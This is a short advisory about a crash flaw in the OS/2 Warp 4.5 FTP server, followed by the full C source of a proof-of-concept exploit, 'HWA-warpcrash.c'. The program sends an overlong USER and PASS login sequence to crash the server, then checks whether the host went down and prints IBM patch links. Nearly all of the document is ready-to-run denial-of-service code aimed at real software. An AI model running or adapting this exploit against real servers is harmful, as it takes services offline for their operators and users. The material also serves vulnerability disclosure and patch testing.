HWA-warpcrash - Systems Affected: OS/2 Warp 4.5 FTP server V4.0/4.2, OS/2 Warp 4.5 FTP server V4.3, Probably other versions of the software as well. Problem: The FTP server that comes with OS/2 Warp 4.5 TCP/IP can be brought down by a malicious connection attempt.
cf8fada37f8c1613e87c090555684cc0f5c51d3e63815104a2e3e47aeb5420ca
/* HWA-warpcrash.c */
/* eth0@hwa-security.net */
/*
Based on this information:
Systems Affected:
- OS/2 Warp 4.5 FTP server V4.0/4.2
- OS/2 Warp 4.5 FTP server V4.3
- Probably other versions of the software as well.
THE PROBLEM
The FTP server that comes with OS/2 Warp 4.5 TCP/IP can be brought down by a
malicious connection attempt.
*/
/* http://www.hwa-security.net */
#include <stdio.h>
#include <strings.h>
#include <errno.h>
#include <signal.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
struct in_addr
resolv (char *name)
{
static struct in_addr in;
unsigned long l;
struct hostent *ent;
if ((l = inet_addr (name)) != INADDR_NONE)
{
in.s_addr = l;
return in;
}
if (!(ent = gethostbyname (name)))
{
in.s_addr = INADDR_NONE;
return in;
}
return *(struct in_addr *) ent->h_addr;
}
testifhostisalive(char *host, int port)
{
struct sockaddr_in addr;
int s;
char c;
s = socket (AF_INET, SOCK_STREAM, 0);
addr.sin_family = AF_INET;
addr.sin_addr = resolv (host);
addr.sin_port = htons (port);
if(connect (s, (struct sockaddr *) &addr, sizeof (addr))==0)
{
printf("System on the other side is patched ===> Good\n");
return;
}
else
{
printf("System on the other side is NOT patched ===> Bad\n");
printf("Fix:\n");
printf(" In case you are using a version prior to 4.3, please contact IBM support for");
printf(" further assistance.\n");
printf("If you are using v4.3, you can get the patch at the following URL:\n");
printf("ftp://ftp.software.ibm.com/ps/products/tcpip/fixes/v4.3os2/ic27721/\n");
printf("Vendor URL: http://www.ibm.com\n");
printf("Product URL: http://www.ibm.com/software/os/warp/\n");
}
return;
}
main (int argc, char *argv[])
{
struct sockaddr_in addr;
int i, s;
char c;
int port = 21;
printf("Systems Affected:\n
- OS/2 Warp 4.5 FTP server V4.0/4.2
- OS/2 Warp 4.5 FTP server V4.3
- Probably other versions of the software as well.\n");
printf ("\n");
if (argc < 2)
{
printf ("Usage : %s <host> [port]\n", argv[0]);
exit (0);
}
if (argc == 3)
port = atoi (argv[2]);
s = socket (AF_INET, SOCK_STREAM, 0);
addr.sin_family = AF_INET;
addr.sin_addr = resolv (argv[1]);
addr.sin_port = htons (port);
connect (s, (struct sockaddr *) &addr, sizeof (addr));
write (s, "USER ", 5);
for (i = 1; i <= 1000; i++)
{
write (s, "a", 1);
}
write (s, "\n", 1);
write (s, "PASS ", 5);
for (i = 1; i <= 100; i++)
{
write (s, "a", 1);
}
write (s, "\n", 1);
read (s, &c, 1);
printf("Done sending malicious connection...\n");
printf("Testing if host was patched or not...\n");
testifhostisalive(argv[1],port);
}